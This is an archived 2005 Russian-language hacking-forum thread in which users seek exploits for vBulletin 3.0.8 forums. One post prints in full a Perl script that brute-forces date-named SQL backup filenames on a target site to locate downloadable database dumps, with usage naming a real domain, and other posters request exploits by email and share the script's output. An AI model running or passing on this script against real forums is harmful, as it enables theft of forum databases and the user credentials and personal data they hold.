Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос по уязвимостям в форуме vBulletin v.3.0.8 (https://forum.antichat.xyz/showthread.php?t=9110)

GaD 29.08.2005 12:12
Вопрос по уязвимостям в форуме vBulletin v.3.0.8
 
Есть ли уязвимости в этом форуме???

К.е.Н 29.08.2005 12:18
:::::::::::::Есть ли уязвимости в этом форуме???:::::::::::::::::::
Ну ты и приколист . Он недавно только вышел. Везде есть уязвимости...

WizART 30.08.2005 01:00
Ээээ...блин, дайте норм ссылки на скачь Булки 3,0,7 и руссификацию, если не сложно))

ProTeuS 30.08.2005 15:35
http://vbulletin.net.ru/

WizART 01.09.2005 00:10
Ммм...а руссификации на 3,0,8 ни у кого не завалялось, а то я на том сайте не нашел...

x_Lex 01.09.2005 15:26
vBulletin <= 3.0.8 Accessible Database Backup Searcher (code fixes)
http://www.milw0rm.com/id.php?id=1189

ProTeuS 04.09.2005 02:53
Цитата:
Сообщение от x_Lex
vBulletin <= 3.0.8 Accessible Database Backup Searcher (code fixes)
http://www.milw0rm.com/id.php?id=1189
x_Lex, ты уже тестил?
4то можно с этого сплойта поиметь(ато щас сижу на та4ке, где не могу скомпилить)?

madnet 04.09.2005 03:56
Цитата:
Сообщение от ProTeuS
x_Lex, ты уже тестил?
4то можно с этого сплойта поиметь(ато щас сижу на та4ке, где не могу скомпилить)?
ничего толкового, если юзер сохранил бэкап и оставил его в папке форума, то можно его стяуть, сплоит просто проверяет наличие данных файлов, не более.

ProTeuS 04.09.2005 04:45
Цитата:
Сообщение от madnet
ничего толкового, если юзер сохранил бэкап и оставил его в папке форума, то можно его стяуть, сплоит просто проверяет наличие данных файлов, не более.
ясно, о4ередной сплойт из серии "русская рулетка"

salikin 09.09.2005 00:54
da privatnie 100 pudova imeutsa, ne takoi on i bezbagni

WizART 09.09.2005 19:38
дк мы это и говорим что багов какраз-таки в новых версиях всегда полно, вот только их найти осталось, а сплойты, ну че сплойты, как купишь, со мной поделишься, ;)

creat0r 11.09.2005 02:41
Интересует, есть ли сплоиты или другие средства взлома для vBulletin 3.0.0 Beta 7 ?
Отпишите плиз. Очень надо.

ProTeuS 11.09.2005 03:09
Цитата:
Сообщение от creat0r
Интересует, есть ли сплоиты или другие средства взлома для vBulletin 3.0.0 Beta 7 ?
Отпишите плиз. Очень надо.
есть сплойт для <3.0.4, но опять же из серии "дабы-если бы-кабы"

k1b0rg 11.09.2005 10:01
наскока я помню начиная с 3,0,7 в булках ведется какоето хитрое шифрование, какое именно я не помню. (может быть похоже с ipb 2.0.4)

creat0r 11.09.2005 19:39
Цитата:
Сообщение от ProTeuS
есть сплойт для <3.0.4, но опять же из серии "дабы-если бы-кабы"
Можешь скинуть сплоит этот? Для подробного разбора как говориться... %)
если не трудно на rex2rex@gmail.com

ProTeuS 12.09.2005 13:53
Цитата:
Сообщение от k1b0rg
наскока я помню начиная с 3,0,7 в булках ведется какоето хитрое шифрование, какое именно я не помню. (может быть похоже с ipb 2.0.4)
Шифрование 4его? если ты про пасы юзверей, то там юзается двойное хеширование с солью, а нас4ет какого-нить шифрование я ни4его пока не слышал...

ProTeuS 12.09.2005 13:57
Цитата:
Сообщение от creat0r
Можешь скинуть сплоит этот? Для подробного разбора как говориться... %)
если не трудно на rex2rex@gmail.com
сей4ас я не дома....скину ближе к выходным (отпиши в ли4ку)...

néM3S!s 27.09.2005 12:49
Exploit Vbulletin 3.0.8 (backup.php) in perl :cool:

Код:
#!/usr/bin/perl
###########################################
# C R O U Z . C O M S E C U R I T Y T E A M #
###########################################
# EXPLOIT FOR: vBULLETIN All Versions Forums Backup Detector #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Vuln Credited By M@FIA From Crouz Security Team #
# #
# Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html #
# #
###########################################
#GR33tz T0 => mh_p0rtal -- Dr-ChephaleX -- The-CepheXin -- Djay_Agoustinno #
# Autumn_Love6 -- Behzad185 -- No_Face_King -- M@FIA # #
# #
# IRANIAN HACKERS AND RESEARCHERS #
# Special Lamerz : Shabgard & Emperor (Two Arabic Lamerz) #
# #
###########################################



use IO::Socket;

if (@ARGV < 2)
{
print "\n===========================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <Target> <DIR>\n\n";
print "===========================\n\n";
print "Examples:\n\n";
print " VbulletinBU.pl www.shabgard.org /Forums/\n\n";
print "You Can Add The Forum Backup Folder \n(It's Default in Forum's Root Directory) \n Example : VbulletinBU.pl www.shabgard.org /Forums/include/ /Alpha Programmer\n\n";

exit();
}

my $host = $ARGV[0];
my $DIR = $ARGV[1];


@Alpha = ('0' , '1' , '2' , '3' , '4' ,'5' , '6' , '7' , '8' , '9' );

foreach $licht0 ( @Alpha ) {
foreach $licht1 ( @Alpha ) {
foreach $licht2 ( @Alpha ) {
foreach $licht3 ( @Alpha ) {
foreach $licht4 ( @Alpha ) {
$crouz = $licht1.$licht2;
$crouz2 = $licht3.$licht4;
$crouz3 = "200";
$crouz3 .= $licht0;

if ($crouz >= 31 ) {
goto LightDoor;
}

if ($crouz2 > 12 ) {
goto LightDoor;
}

if ($crouz3 > 2005 ) {
goto LightDoor;
}

print "forumbackup-$crouz-$crouz2-$crouz3.sql\n";
$Sirius = "forumbackup-$crouz2-$crouz-$crouz3.sql";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

$http = "HEAD $DIR$Sirius HTTP/1.0\n";
$http .= "Host: $host\n\r\n\r";
print "\n";
print $remote $http;
sleep(1);

while ($sirus=<$remote>)
{
if($sirus =~ "200 OK") {
print "$sirus";
print "Nice ... You Found The BackUp Of VBulletin Forum , See This URL :\n";
print "$host$DIR$Sirius\n\n";
goto start;
}
}
}
LightDoor:
}
}
}
}

start:

#EoF
enjOY néM3S!s

bul666 27.09.2005 13:02
Итересно... У меня идет строчки типа forumbackup-00-01-2000.sql А где они должны быть?

néM3S!s 27.09.2005 13:11
sorry, I don't understand.. i'm french..
you speak english ?
put your question in english please :))

censored! 27.09.2005 15:06
http://www.online-translator.com/text.asp?lang=en

English-Russian
Russian-English
German-Russian
Russian-German
French-Russian
Russian-French
Italian-Russian
Spanish-Russian
Russian-Spanish
English-German
German-English
English-French
French-English
French-German
English-Spanish
Spanish-English
French-Spanish
Spanish-French
English-Portuguese
Portuguese-English

http://www.online-translator.com/text.asp?lang=en

néM3S!s 27.09.2005 15:18
Thx ;) i have my translator ;)

SK | Heaton 27.09.2005 17:24
а как тут франц. попал ?! Не бусь парфум искал :)

WizART 27.09.2005 19:22
че за флуд в теме о вобле???

К.е.Н 01.10.2005 02:30
Меня одно прикалывает так это WizART.Сам нафлудит а потом кричит на остальных за флуд

Otaku 01.10.2005 04:01
Цитата:
Сообщение от néM3S!s
sorry, I don't understand.. i'm french..
you speak english ?
put your question in english please :))
http://babel.altavista.com/tr :cool:

Alyoxa 01.10.2005 16:06
a dlya vBulletin 3.0.7 ne kto ne znayet Exploita rebyata ?.

Woldemar 20.01.2006 02:29
Йоу! чё за фича такая

forumbackup-28-08-2000.sql
forumbackup-28-09-2000.sql
forumbackup-28-10-2000.sql
forumbackup-28-11-2000.sql
forumbackup-28-12-2000.sql

Чё делать дальше я не понял 8-)


Время: 03:38